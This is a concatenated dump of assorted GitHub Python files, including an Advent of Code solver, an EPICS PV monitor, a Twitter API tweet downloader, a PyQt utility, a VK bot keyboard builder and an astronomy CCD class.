list(Walker(directories, args.recursive, pfilter))\n print(\"Found these repositories:\")\n for repo in repos:\n print(f\" -> {repo.working_dir}\")\n if not confirm(\"These repositories will be updated. Do you want to continue?\", args.yes):\n print(\"Aborting!\")\n return\n remote_count = 0\n for r in tqdm(repos, unit=\"repo\"):\n remote_count += update(r, args.skip)\n print(f\"Updated {len(repos)} repositories and fetched {remote_count} remotes.\")","repo_name":"RenoirTan/GitOut","sub_path":"gitout/update/_cli.py","file_name":"_cli.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31847547907","text":"import os\r\nimport re\r\nimport sys\r\n\r\n\r\nINSTRUCTION_PATTERN = re.compile(\r\n r'(?P\\w{3}) (?P[\\+\\-]{1}\\d+)\\n?')\r\n\r\n\r\ndef instruction_acc(runtime, argument):\r\n return {**runtime, \"acc\": runtime[\"acc\"] + argument}\r\n\r\n\r\ndef instruction_jmp(runtime, argument):\r\n return {**runtime, \"pointer\": runtime[\"pointer\"] + argument}\r\n\r\n\r\ndef instruction_nop(runtime, argument):\r\n return runtime\r\n\r\n\r\nINSTRUCTIONS = {\r\n \"acc\": instruction_acc,\r\n \"nop\": instruction_nop,\r\n \"jmp\": instruction_jmp,\r\n}\r\n\r\n\r\ndef parse_program(stream):\r\n specs = (INSTRUCTION_PATTERN.match(line) for line in stream)\r\n return [{\"instruction\": spec.group('instruction'), \"argument\": int(spec.group('argument'))} for spec in specs]\r\n\r\n\r\ndef run_program(program):\r\n history = []\r\n runtime = {\"pointer\": 0, \"acc\": 0}\r\n\r\n while runtime[\"pointer\"] < len(program):\r\n pointer = runtime[\"pointer\"]\r\n argument = program[pointer][\"argument\"]\r\n run_instruction = INSTRUCTIONS[program[pointer][\"instruction\"]]\r\n runtime = run_instruction(runtime, argument)\r\n runtime[\"pointer\"] = pointer + \\\r\n 1 if pointer == runtime[\"pointer\"] else runtime[\"pointer\"]\r\n\r\n if runtime[\"pointer\"] in history:\r\n break\r\n\r\n history.append(pointer)\r\n\r\n return runtime\r\n\r\n\r\ndef swap_at_line(program, line_number):\r\n swapped = {**program[line_number], \"instruction\": \"nop\" if program[line_number]\r\n [\"instruction\"] == \"jmp\" else \"jmp\"}\r\n return program[:line_number] + [swapped] + program[line_number + 1:]\r\n\r\n\r\nprogram = parse_program(sys.stdin)\r\n\r\nprint(\"solution 1:\", run_program(program)[\"acc\"])\r\n\r\nswappable_lines = (line_number for line_number, spec in enumerate(\r\n program) if spec[\"instruction\"] in [\"nop\", \"jmp\"])\r\nedited_programs = (swap_at_line(program, line_number)\r\n for line_number in swappable_lines)\r\nruntimes = (run_program(edited_program) for edited_program in edited_programs)\r\nfinished_runtimes = [\r\n runtime for runtime in runtimes if runtime[\"pointer\"] == len(program)]\r\n\r\nprint(\"solution 2:\", finished_runtimes[0][\"acc\"])\r\n","repo_name":"dawee/advent-of-code-2020","sub_path":"day-8/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"1919183478","text":"#!/usr/bin/env python\n'''Module for monitoring PVs and displaying stats to the terminal.\n\nThis is based heavily on a script written by Daniel Duke in 2015 for\nmonitoring PVs during scans for the fuel spray project.\nThe main changes in this module are making it a module, rather \nthan a stand-alone script.\n\nAlan Kastengren, XSD, APS\nStarted: January 30, 2017\n'''\n#Imports\nimport epics\nimport time\nimport sys\nimport termcolor\nimport colorama\n\n# Reporting interval and poll time in s.\n_print_interval = 5 #Time = _print_interval * _poll_time\n_poll_time = 1\n_header_interval = 5 #Time = _print_interval * _poll_time * _header_interval\n\n#Globals to store names of monitored PVs and limits\nstored_PV_names = []\nstored_PV_desc = []\nstored_PV_obj = []\nhigh_limits = []\nlow_limits = []\n\n#Globals giving PV to actuate and how to set it\nactive_PV = None\naction_PV = None\npause_value = 1\nresume_value = 0\n\n#Initiate colorama\ncolorama.init()\n\ndef add_PV(pv_name,upper_limit,lower_limit):\n '''Add a PV to be monitored.\n \n Inputs:\n pv_name: name of the PV to be added to our monitor list\n upper_limit: value for PV at which alarm will occur\n lower_limit: value for PV at which alarm will occur\n '''\n #Append these data to the existing global lists\n stored_PV_names.append(pv_name)\n high_limits.append(upper_limit)\n low_limits.append(lower_limit)\n #Make PV objects and store them\n stored_PV_obj.append(epics.PV(pv_name+'.VAL'))\n #Try to find a description to add\n desc = epics.caget(pv_name+'.DESC')\n if desc:\n stored_PV_desc.append(desc)\n else:\n stored_PV_desc.append(pv_name)\n return\n\ndef start_monitoring():\n #Infinite loop\n try:\n i = 0 #Loop counter\n while True:\n #Set up a flag to see if we alarm on any PVs\n bad_value = False\n #If we aren't active, just bide our time\n if epics.caget(active_PV)==1:\n termcolor.cprint('Scan not running', 'yellow')\n else:\n #Check the values of all of the PVs being monitored\n for current_PV,high_lim,low_lim,current_desc in zip(\n stored_PV_obj,high_limits,low_limits,stored_PV_desc):\n #If limits are exceeded, print to terminal and \n if current_PV.value >= high_lim:\n termcolor.cprint( '%s above set limit!' % current_desc , \n 'red' , attrs={'bold':True} )\n bad_value = True\n elif current_PV.value <= low_lim:\n termcolor.cprint( '%s below set limit!' % current_desc , \n 'blue' , attrs={'bold':True} )\n bad_value = True\n #Either pause or resume based on these results\n if bad_value:\n epics.caput(action_PV,pause_value,wait=True)\n termcolor.cprint(\"Scan paused!\",'yellow')\n sys.stdout.write('\\a')\n else:\n if epics.caget(action_PV) == pause_value:\n epics.caput(action_PV,resume_value,wait=True)\n termcolor.cprint(\"Scan resumed!\",'green')\n i == 0\n \n #Are we ready to print out the header info\n if not i % (_print_interval * _header_interval):\n print(80*'#')\n print(\"\")\n header_line = '{:12s}'.format('Time')\n for desc in stored_PV_desc:\n header_line += '{:16s}'.format(desc)\n termcolor.cprint(header_line,'grey')\n if not i % _print_interval:\n print_line = '{:12s}'.format(time.strftime(\"%H:%M:%S\",time.localtime()))\n for current_PV in stored_PV_obj:\n if abs(current_PV.value) > 1000 or abs(current_PV.value) < 0.01:\n print_line += '{:<16.3e}'.format(current_PV.value)\n else:\n print_line += '{:<16.3f}'.format(current_PV.value)\n termcolor.cprint(print_line,'green')\n #Increment counter and sleep for _poll_interval seconds.\n i += 1\n time.sleep(_poll_time)\n except KeyboardInterrupt():\n print(\"Interrupted by keyboard\")\n return\n ","repo_name":"aps-7bm/PyEpics_Scripting_Library","sub_path":"PV_Monitor.py","file_name":"PV_Monitor.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"24281089098","text":"import os\nimport json\nimport requests\nimport argparse\nfrom tqdm import tqdm\nfrom datetime import datetime, timedelta\n\n# credentials\nimport config\nAPI_KEY = config.API_KEY\nAPI_SECRET = config.API_SECRET\nBEARER_TOKEN = config.BEARER_TOKEN\n\n\ndef get_end_time(start_time):\n \"\"\"\n param: start_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n return: end_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n \"\"\"\n start_time = datetime.strptime(start_time, '%Y-%m-%dT%H:%M:%S.000Z')\n end_time = start_time + timedelta(hours=1)\n return end_time.strftime('%Y-%m-%dT%H:%M:%S.000Z')\n\n\ndef get_tweets_v2(start_time, end_time, max_results, query_type):\n \"\"\"\n param: \n start_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n end_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n max_results: int, max number of tweets to return\n query_type: string, 'user' or 'keyword'\n return:\n tweets: list of tweets\n \"\"\"\n headers = {'Authorization': 'Bearer {}'.format(BEARER_TOKEN)}\n\n if query_type == 'user':\n userlist = input('Enter a list of username, separated by commas:')\n userlist = userlist.split(',')\n results = []\n for user in userlist:\n # find tweets by user\n url = 'https://api.twitter.com/2/tweets/search/recent?query=from%3A{}&start_time={}&end_time={}&max_results={}&tweet.fields=author_id,created_at,text'.format(\n user, start_time, end_time, max_results)\n response = requests.request('GET', url, headers=headers)\n\n if response.json()['meta']['result_count'] > 0:\n results.extend(response.json()['data'])\n return results\n elif query_type == 'keyword':\n keyword = input('Enter a keyword:')\n if max_results <= 100:\n url = 'https://api.twitter.com/2/tweets/search/recent?query={}&start_time={}&end_time={}&max_results={}&tweet.fields=author_id,created_at,text'.format(\n keyword, start_time, end_time, max_results)\n response = requests.request('GET', url, headers=headers)\n\n if 'data' in response.json():\n return response.json()['data']\n else:\n return []\n else:\n # if max_results > 100, we need to loop through the pages\n results = []\n url = 'https://api.twitter.com/2/tweets/search/recent?query={}&start_time={}&end_time={}&max_results=100&tweet.fields=author_id,created_at,text'.format(\n keyword, start_time, end_time)\n response = requests.request('GET', url, headers=headers)\n if 'data' in response.json():\n results.extend(response.json()['data'])\n\n # check if there are more pages\n if 'next_token' in response.json()['meta']:\n next_token = response.json()['meta']['next_token']\n else:\n next_token = None\n\n # pagination\n with tqdm(total=max_results) as pbar:\n while next_token and len(results) < max_results:\n url = 'https://api.twitter.com/2/tweets/search/recent?query={}&start_time={}&end_time={}&max_results=100&tweet.fields=author_id,created_at,text&next_token={}'.format(\n keyword, start_time, end_time, next_token)\n response = requests.request('GET', url, headers=headers)\n\n if 'data' in response.json():\n results.extend(response.json()['data'])\n\n # check if there are more pages\n if 'meta' in response.json() and 'next_token' in response.json()['meta']:\n next_token = response.json()['meta']['next_token']\n else:\n print('No more tweets')\n next_token = None\n pbar.update(100)\n\n return results\n\n\ndef export2file(tweets, folder):\n \"\"\"\n param:\n tweets: list of tweets\n folder: string, folder to save the tweets\n \"\"\"\n if not os.path.exists(folder):\n # create folder if not exist\n os.makedirs(folder)\n # save tweets to a file\n with open('{}/tweets.txt'.format(folder), 'w') as f:\n json.dump(tweets, f)\n else:\n if os.path.exists('{}/tweets.txt'.format(folder)):\n # append to existing file\n with open('{}/tweets.txt'.format(folder), 'r') as f:\n old_tweets = json.load(f)\n old_tweets.extend(tweets)\n with open('{}/tweets.txt'.format(folder), 'w') as f:\n json.dump(old_tweets, f)\n else:\n # save tweets to a file\n with open('{}/tweets.txt'.format(folder), 'w') as f:\n json.dump(tweets, f)\n\n\nif __name__ == '__main__':\n # parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--query-type', help='query type',\n choices=['keyword', 'user'], required=True)\n parser.add_argument(\n '--date', help='start date, format: YYYY-MM-DD', required=True, type=str)\n parser.add_argument(\n '--hour', help='start hour, format: HH', type=int, required=True)\n parser.add_argument('--max-results', help='max results',\n required=True, type=int)\n\n # initialize variables\n args = parser.parse_args()\n start_time = '{}T{:02d}:00:00.000Z'.format(args.date, args.hour)\n end_time = get_end_time(start_time)\n\n # get tweets from start date to end date\n tweets = get_tweets_v2(start_time, end_time,\n args.max_results, args.query_type)\n\n folder = 'tweets/date={}/hour={}'.format(args.date, args.hour)\n export2file(tweets, folder)\n","repo_name":"iblh/tweets-analyzer","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"40689642466","text":"\"\"\"empty message\n\nRevision ID: 1e2b88d5c846\nRevises: c14de92ddd0f\nCreate Date: 2022-04-12 17:48:17.435105\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1e2b88d5c846'\ndown_revision = 'c14de92ddd0f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('quotes', sa.Column('char_count', sa.Integer(), nullable=False))\n op.drop_column('quotes', 'title')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('quotes', sa.Column('title', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.drop_column('quotes', 'char_count')\n # ### end Alembic commands ###\n","repo_name":"j00nk1/aa-solo-project-capstone","sub_path":"migrations/versions/20220412_174817_.py","file_name":"20220412_174817_.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"21942061289","text":"import ctypes\nfrom ctypes import *\n\n# lib = ctypes.cdll.LoadLibrary(\"C://Users//xmgd//Desktop//MT16//11_15_DLL_64//smncsftmt.dll\")\nlib = ctypes.cdll.LoadLibrary(r\"D:\\MT16\\11_9_DLL\\smncsftmt.dll\")\n\n# 初始化\ndll_init = lib.InitDll\ndll_init()\n\ndll_usbconnect = lib.USBConnected\ndll_usbconnect.argtypes = [c_int]\ndll_usbconnect.restypes = c_int\nprint(\"USB连接测试:\", dll_usbconnect(0))\n\n# 设置数据采集时间\ndll_setstatisticstime = lib.SetStatisticsTime\ndll_setstatisticstime.argtypes = [c_int, c_float]\ndll_setstatisticstime.restypes = c_int\n# dll_setstatisticstime(6, 3.0)\nprint(\"设置数据采集时间:\", dll_setstatisticstime(6, 1.0))\n\n# 设置文件保存方式\ndll_setfilemode = lib.SetFileMode\ndll_setfilemode.argtypes = [c_int, c_int, c_int]\ndll_setfilemode.restypes = c_int\n# dll_setfilemode(6, 1, 1)\nprint(\"设置文件保存方式:\", dll_setfilemode(6, 1, 1))\n\n# 设置统计周期\ndll_setittrinterval = lib.SetITTRInterval\ndll_setittrinterval.argtypes = [c_int, c_int, c_int]\nprint(\"设置统计周期:\", dll_setittrinterval(0, 0, 1000))\n\n# 设置采集数据文件保存路径\ndll_setfilepath = lib.SetFilePath\ndll_setfilepath.argtypes = [c_int, c_int, POINTER(c_char)]\ndll_setfilepath.restypes = c_int\npath_char = (c_char*64)(*bytes(\"D:\\MT16_PATH\", \"utf-8\"))\nprint(\"设置采集数据文件保存路径:\", dll_setfilepath(0, 6, path_char))\n\n# 使能ITTR模式\ndll_enableittr = lib.EnableITTR\ndll_enableittr.argtypes = [c_int, c_int, c_int]\nprint(\"使能ITTR模式:\", dll_enableittr(0, 0, 1))\n\n\n#设置停止方式\ndll_setittrendmode = lib.SetITTREndMode\ndll_setittrendmode.argtypes = [c_int, c_int]\nprint(\"设置停止方式:\", dll_setittrendmode(1, 100))\n\n# 开始任务\ndll_starttask = lib.StartTask\ndll_starttask.argtypes = [c_int]\ndll_starttask.restypes = c_int\n# dll_starttask(6)\nprint(\"开始任务:\", dll_starttask(6))\n# # 判断任务是否执行完成\ndll_istaskcompleted = lib.IsTaskCompleted\ndll_istaskcompleted.restypes = c_int\nwhile True:\n if dll_istaskcompleted() == 0:\n break\n# 反初始化\ndll_uninitdll = lib.UnInitDll\n# dll_uninitdll()\nprint(\"反初始化:\", dll_uninitdll())\n\n","repo_name":"qinyuanhao17/asg_cw_odmr","sub_path":"ft1040_example.py","file_name":"ft1040_example.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"18503652181","text":"import pytest\n\nfrom pimp_my_engine.core.dtypes.data_queue import DataQueue\n\nclass TestDataQueue(object):\n \n def test_add_and_pop(self):\n dq = DataQueue()\n element = [1,2,3]\n dq.add(element)\n element_queue = dq.pop()\n assert element_queue == element\n\n def test_add_different_types(self):\n dq = DataQueue()\n elements = ['a', [1,2,3], 2323]\n dq.add(elements[0])\n dq.add(elements[1])\n dq.add(elements[2])\n for _ in range(3):\n assert dq.pop() == elements.pop()\n\n def test_erase(self):\n dq = DataQueue()\n element = 1\n dq.add(element)\n dq.erase()\n assert dq.is_empty() == True\n\n def test_pop_from_emptylist(self):\n with pytest.raises(IndexError):\n dq = DataQueue()\n dq.pop()\n\n\n","repo_name":"r00ta/pimp-my-engine","sub_path":"pimp_my_engine/tests/test_data_queue.py","file_name":"test_data_queue.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"17657733346","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom win32api import GetSystemMetrics\nimport os\nimport subprocess\nfrom PIL import Image\nimport time\nimport platform\nimport shutil\n\nclass UtilTools(object):\n def __init__(self):\n super().__init__()\n\n def get_desktop_size(self):\n return (GetSystemMetrics (0),GetSystemMetrics (1))\n\n def is_number(self,s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n return False\n \n def sysDefaultOpen(self, filePath):\n plat = platform.system()\n if plat == 'Darwin':\n subprocess.call(['open'], filePath)\n elif plat == 'Linux':\n subprocess.call(['xdg-open'], filePath)\n else:\n os.startfile(filePath)\n\n def clearTempFile(self):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n tempPath = os.path.join(current_dir,'static/temp/') \n try:\n if os.path.exists(tempPath):\n shutil.rmtree(tempPath)\n os.mkdir(tempPath)\n else:\n os.makedirs(tempPath)\n except:\n pass\n\n def copyFile(self,oldFile,newFile):\n #以二进制方式打开视频\n v_src = open(oldFile,'rb')\n #读取视频中所有数据\n content = v_src.read()\n #创建复制出来的文件\n v_copy = open(newFile,'wb')\n #写入\n v_copy.write(content)\n #关闭操作\n v_src.close()\n v_copy.close()\n\n\nclass ClipBoard(QWidget):\n def __init__(self):\n super(ClipBoard,self).__init__()\n self.utils = UtilTools()\n self.initUI()\n \n def initUI(self):\n d_w,d_h=self.utils.get_desktop_size()\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setWindowState(Qt.WindowMaximized )\n self.imageLabel=QLabel()\n layout = QGridLayout()\n layout.setContentsMargins(0,0,0,0) #设置布局没有边缘空白\n self.imageLabel.setScaledContents(True)\n self.imageLabel.setMaximumSize(d_w*0.9,d_h*0.8)\n layout.addWidget(self.imageLabel,2,2)\n self.setLayout(layout)\n self.setWindowTitle('截图图片展示')\n\n def pasteImage(self):\n self.utils.clearTempFile()\n clipboard = QApplication.clipboard()\n if clipboard.mimeData().hasImage():\n try:\n qt_img = clipboard.image()\n pil_img = Image.fromqimage(qt_img) # 转换为PIL图像\n current_dir = os.path.dirname(os.path.abspath(__file__))\n temPath = os.path.join(current_dir,'static/temp/'+str(int(round(time.time() * 1000)))+'.png') \n pil_img.save(temPath, \"PNG\")\n self.utils.sysDefaultOpen(temPath)\n except: \n self.show()\n self.imageLabel.setPixmap(clipboard.pixmap())#从剪贴板获得图片\n\nclass SaveVideo(QWidget):\n def __init__(self):\n super().__init__()\n self.utils = UtilTools()\n \n def save(self,videoUrl,videoPathName):\n desktopPath = os.path.join(os.path.expanduser('~'),\"Desktop\")\n desktopPathUrl = os.path.join(desktopPath,videoPathName) \n filename = QFileDialog.getSaveFileName(self,'保存录屏',desktopPathUrl) \n if filename[0]:\n self.utils.copyFile(videoUrl,filename[0])\n\nclass AboutAuthor(QWidget):\n def __init__(self):\n super().__init__()\n self.utils = UtilTools()\n self.app_width = 300\n self.app_height = 300\n self.initUI()\n \n def initUI(self): #初始化界面UI\n self.setFixedSize(self.app_width, self.app_height);\n self.resize(self.app_width, self.app_height)\n self.setWindowTitle('关于作者') \n self.setPostion()\n current_dir = os.path.dirname(os.path.abspath(__file__))\n iconPath = os.path.join(current_dir,'static/icon.png') \n self.setWindowIcon(QIcon(iconPath)) \n vLayout = QVBoxLayout()\n # 创建控件\n self.txtEdit = QTextEdit()\n self.txtEdit.setFocusPolicy(Qt.NoFocus)\n vLayout.addWidget(self.txtEdit)\n self.setLayout(vLayout)\n self.txtEdit.setHtml(\"Alex,四年多web前端!\")\n\n def setPostion(self): #设置窗口位置 \n d_w,d_h=self.utils.get_desktop_size()\n self.move((d_w-self.app_width) / 2,(d_h-self.app_height) / 2)\n\n","repo_name":"AceAZhe/py-tools","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"11359469481","text":"from player import Player\n\nimport random\n\n\nclass Game:\n def __init__(self, player: Player, words: list[str], solution: str = None):\n self.player = player\n self.guesses = []\n self.wrong_guesses = 0\n self.guess_count = 0\n self.words = words\n self.solution = solution if solution in words else random.choice(words)\n\n def play(self):\n state = self.build_state()\n\n while state != self.solution:\n guess = self.player.guess(state, self.guesses, self.words)\n\n for c in guess:\n if c not in self.guesses:\n self.guess_count += 1\n self.guesses.append(c)\n if guess not in self.solution:\n self.wrong_guesses += 1\n\n state = self.build_state()\n\n return self.guess_count, self.wrong_guesses\n\n def build_state(self) -> str:\n state = [c if c in self.guesses else '_' for c in self.solution]\n return ''.join(state)\n","repo_name":"S-Tim/hangman","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71829246766","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MCDropout(nn.Module):\n def __init__(self, n_layers, p):\n super(MCDropout, self).__init__()\n self.layers = nn.ModuleList([\n nn.Linear(in_features, out_features)\n for in_features, out_features in zip(n_layers[:-1], n_layers[1:])\n ])\n self.p = p\n\n def forward(self, x):\n # do not perform dropout on the input layer\n x = F.relu(self.layers[0](x))\n\n for layer in self.layers[1:-1]:\n x = F.relu(layer(F.dropout(x, self.p, training=True)))\n\n x = self.layers[-1](F.dropout(x, self.p, training=True))\n\n return x\n","repo_name":"tomveh/uncertainty","sub_path":"models/MCDropout.py","file_name":"MCDropout.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"41063608952","text":"import json\nimport os\nfrom vk_bot.db.conf import get_db_manager\n\n\nclass Button:\n def __init__(self, label, button_type=\"text\", color=\"secondary\"):\n self.label = label\n self.button_type = button_type\n self.color = color\n self.count = 0\n\n def as_json(self):\n return {\n \"action\": {\n \"type\": self.button_type,\n \"label\": self.label\n },\n \"color\": self.color\n }\n\n def __str__(self):\n return f'Button(label={self.label}, type={self.button_type}, color={self.color})'\n\n\nclass VKeyboard:\n def __init__(self, path, one_time=False):\n self.one_time = one_time\n self.path = path\n self.count = -1\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, filename):\n if not filename.endswith('json'):\n raise ValueError(\"Формат файла клавиатуры должен быть json.\")\n\n if 'keyboards_json' not in os.listdir():\n os.makedirs('keyboards_json')\n\n self._path = os.path.join('keyboards_json', filename)\n\n with open(self._path, 'w', encoding='utf-8') as f:\n data = {\n \"one_time\": self.one_time,\n \"buttons\": []\n }\n\n json.dump(data, f, indent=4)\n\n def set_data(self, json_data):\n with open(self.path, 'w', encoding='utf-8') as f:\n json.dump(json_data, f, indent=4)\n\n def add_button(self, button):\n json_data = self.get_data(to_vk=False)\n if self.count == -1:\n json_data['buttons'].append([button.as_json()])\n self.count += 1\n self.set_data(json_data)\n else:\n json_data['buttons'][-1].append(button.as_json())\n self.set_data(json_data)\n self.count = -1\n\n def add_row(self, *args):\n buttons_list = []\n\n for button in args:\n buttons_list.append({\n \"action\": {\n \"type\": button.button_type,\n \"label\": button.label\n },\n \"color\": button.color\n })\n\n json_data = self.get_data(to_vk=False)\n\n json_data['buttons'].append(buttons_list)\n\n self.set_data(json_data)\n\n def get_data(self, to_vk=False):\n if to_vk:\n self.add_row(Button(label=\"Меню 🔍\", color=\"positive\"), Button(label=\"Назад 🛑\", color=\"negative\"))\n\n with open(self.path, 'r', encoding='utf-8') as f:\n return f.read() if to_vk else json.loads(f.read())\n\n\ndef make_main_menu_kb():\n menu_kb = VKeyboard('menu.json', one_time=False)\n b1 = Button(label='Категории')\n\n menu_kb.add_button(b1)\n\n return menu_kb\n\n\ndef make_categories_kb():\n categories_keyboard = VKeyboard('categories.json', one_time=False)\n for cat in get_db_manager().get_categories():\n categories_keyboard.add_button(Button(label=cat.name, color=\"primary\"))\n\n return categories_keyboard\n\n\ndef make_products_kb(message):\n products_keyboard = VKeyboard('products.json', one_time=False)\n for product in get_db_manager().get_products(message.text):\n\n products_keyboard.add_button(Button(label=product.name))\n\n return products_keyboard\n\n","repo_name":"777boeing777/vk_baking_bot","sub_path":"keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"28465849372","text":"from numpy import *\nfrom utils.term import *\nfrom classes.shot import Shot\nfrom classes.triplet import Triplet\nfrom classes.block import Block\n\nclass CCD():\n __slots__ = ('__dict__','uid','id','data','shot','triplet','block','dataPath',\n 'sky_background','background_average','background_median','background_std','background_proportion',\n 'fwhm',\n 'apcor_inner_radius', 'apcor_outer_radius', 'apcor_factorn', 'apcor_uncertainty',\n 'zeropoint',\n 'trans_mat')\n\n all = {}\n lastID = 0\n\n \"\"\"\n ___ _ _ \n |_ _|_ __ (_) |_ \n | || '_ \\| | __|\n | || | | | | |_ \n |___|_| |_|_|\\__|\n \n \"\"\"\n\n def __init__(self, id = None, data:ndarray = None, shot:Shot = None, triplet:Triplet = None, block:Block = None, dataPath:str = None):\n self.uid :str = f\"{shot.id}p{id}\"\n self.id :int = id\n self.data :ndarray = data\n self.shot :Shot = shot\n self.triplet :Triplet = triplet\n self.block :Block = block\n self.dataPath :str = dataPath\n self.sky_background :ndarray = None\n self.background_median :float = None\n self.background_average :float = None\n self.background_std :float = None\n self.background_proportion :float = None\n self.fwhm :float = None\n self.apcor_inner_radius :float = None\n self.apcor_outer_radius :float = None\n self.apcor_factor :float = None\n self.apcor_uncertainty :float = None\n self.zeropoint :float = None\n self.trans_mat :ndarray = None\n\n if self not in shot.ccdList:\n shot.ccdList.append(self)\n\n if self.uid in CCD.all:\n raise ValueError(\"A CCD with this UID already exist\")\n else:\n CCD.all.update({self.uid:self})\n\n \"\"\"\n ____ _ _ _ \n / ___|___ _ __ ___ _ __ _ _| |_ __ _| |_(_) ___ _ __ ___ \n | | / _ \\| '_ ` _ \\| '_ \\| | | | __/ _` | __| |/ _ \\| '_ \\/ __|\n | |__| (_) | | | | | | |_) | |_| | || (_| | |_| | (_) | | | \\__ \\\n \\____\\___/|_| |_| |_| .__/ \\__,_|\\__\\__,_|\\__|_|\\___/|_| |_|___/\n |_| \n \"\"\"\n\n def compute_sky_background(self, verbose = False, prefix = \"\"):\n \"\"\"This function compute the sky background\"\"\"\n img = self.data\n \n if img is None:\n print(f\"/!\\ CCD{self.id} contain no data (shot n°{self.shot.id}, triplet {self.triplet.id})\\n -> {self.shot.dataPath}\")\n return\n\n for i in range(3):\n a = mean(img[img!=0]); s = std(img[img!=0])\n if verbose: print(f\"{prefix}Loop {i}: Median={round(median(img),2)}, Average={round(a,2)}, Standrad deviation={round(s,2)}\")\n img = img * (img < a+3*s) * (img > a-3*s)\n\n m = median(img); a = mean(img[img!=0]); s = std(img[img!=0])\n if verbose: print(f\"{prefix}Loop {i}: Median={round(m,2)}, Average={round(a,2)}, Standrad deviation={round(s,2)}\")\n\n sizeX, sizeY = img.shape\n\n self.sky_background = img\n self.background_median = m\n self.background_average = a\n self.background_std = s\n self.background_proportion = sum(img!=0) / (sizeX*sizeY)\n \n def mp_compute_sky_background(ccd, totalCCD=-1, verbose=False, prefix=\"\"):\n \"\"\"Allow to parrallelize the call of sky_backgroud()\"\"\"\n\n if verbose == 2: print(f\"{prefix}Computing sky background of CCD {int(ccd.id)}...\")\n if verbose == True: progressbar(int(ccd.id) / (totalCCD-1), prefix=prefix)\n\n ccd.compute_sky_background()\n\n if verbose == 2: print(f\"{prefix}Sky background of CCD {int(ccd.id)} computed.\")\n\n def computeFWHM(self):\n pass # TODO\n\n def computeAPCOR(self):\n pass # TODO\n\n \"\"\"\n _ _ _ _ _ \n | | | | |_(_) |___ \n | | | | __| | / __|\n | |_| | |_| | \\__ \\\n \\___/ \\__|_|_|___/\n \n \"\"\"\n\n # As the CCD can contain a lot of data, this function allow to free the memory by unloading unused CCDs\n def unload(self,all=False):\n self.data = None\n self.sky_background = None\n if all:\n self.background_median = None\n self.background_average = None\n self.background_std = None\n self.background_proportion = None\n\n # Export in a dictionnary to be stored in a human-readable format\n def to_dict(self):\n dict = {'id':self.id,\n 'background_average' :self.background_average,\n 'background_median' :self.background_median,\n 'background_std' :self.background_std,\n 'background_proportion':self.background_proportion,\n 'fwhm' :self.fwhm,\n 'apcor_inner_radius' :self.apcor_inner_radius,\n 'apcor_outer_radius' :self.apcor_outer_radius,\n 'apcor_factor' :self.apcor_factor,\n 'apcor_uncertainty' :self.apcor_uncertainty,\n 'zeropoint' :self.zeropoint,\n 'trans_a' :self.trans_mat[0] if self.trans_mat is not None else None,\n 'trans_b' :self.trans_mat[1] if self.trans_mat is not None else None,\n 'trans_c' :self.trans_mat[2] if self.trans_mat is not None else None,\n 'trans_d' :self.trans_mat[3] if self.trans_mat is not None else None,\n 'trans_e' :self.trans_mat[4] if self.trans_mat is not None else None,\n 'trans_f' :self.trans_mat[5] if self.trans_mat is not None else None\n }\n return dict\n\n # Export in numpy array that can be used to train an ai (need to be normalized before)\n def to_ai_ready(self, **kwargs):\n return array( [ self.background_median,\n self.background_average,\n self.background_std,\n self.background_proportion,\n self.fwhm,\n self.apcor_inner_radius,\n self.apcor_outer_radius,\n self.apcor_factor,\n self.apcor_uncertainty,\n self.zeropoint\n ] + list(self.trans_mat))","repo_name":"Leirof/M1-TNO_Detection_Efficiency","sub_path":"classes/ccd.py","file_name":"ccd.py","file_ext":"py","file_size_in_byte":6769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
